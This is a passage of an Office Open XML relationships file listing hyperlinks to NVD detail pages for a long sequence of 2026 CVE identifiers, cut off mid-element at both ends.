Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90296" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90297" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90298" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90299" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90300" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90301" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90302" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90303" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90304" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90305" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90306" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90307" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90308" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90309" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90310" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90311" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90312" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90313" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90314" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90315" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90316" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90317" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90318" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90319" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90320" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90321" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90322" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90323" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90324" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90325" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90326" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90327" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90328" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90329" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90330" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90331" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90332" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90333" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90334" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90335" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90336" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90337" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90338" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90339" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90340" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90341" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90342" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90343" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90344" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90345" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90346" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90347" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90348" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90349" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90350" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90351" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90352" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90353" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90354" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90355" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90356" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90357" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90358" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90359" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90360" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90361" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90362" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90363" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90364" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90365" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90366" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90367" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90368" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90369" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90370" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90371" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90372" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90373" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90374" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90375" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90376" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90377" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90378" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90379" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90380" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90381" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90382" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90383" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90384" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90385" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90386" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90387" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90388" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90389" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90390" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90391" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90392" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90393" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90394" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90395" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90396" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90397" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90398" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90399" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90400" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90401" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90402" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90403" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90404" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90405" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90406" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90407" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90408" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90409" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90410" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90411" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90412" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90413" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90414" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90415" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90416" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90417" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90418" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90419" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90420" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90421" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90422" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90423" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90424" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90425" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90426" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90427" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90428" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90429" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90430" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90431" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90432" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90433" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90434" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90435" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92230" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92476" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92477" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92478" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92479" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92480" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92481" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92482" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92483" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92484" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92485" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92486" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92487" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92488" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92489" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92490" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92491" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92492" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92493" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92494" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92495" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92496" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92497" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92498" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92499" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92500" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 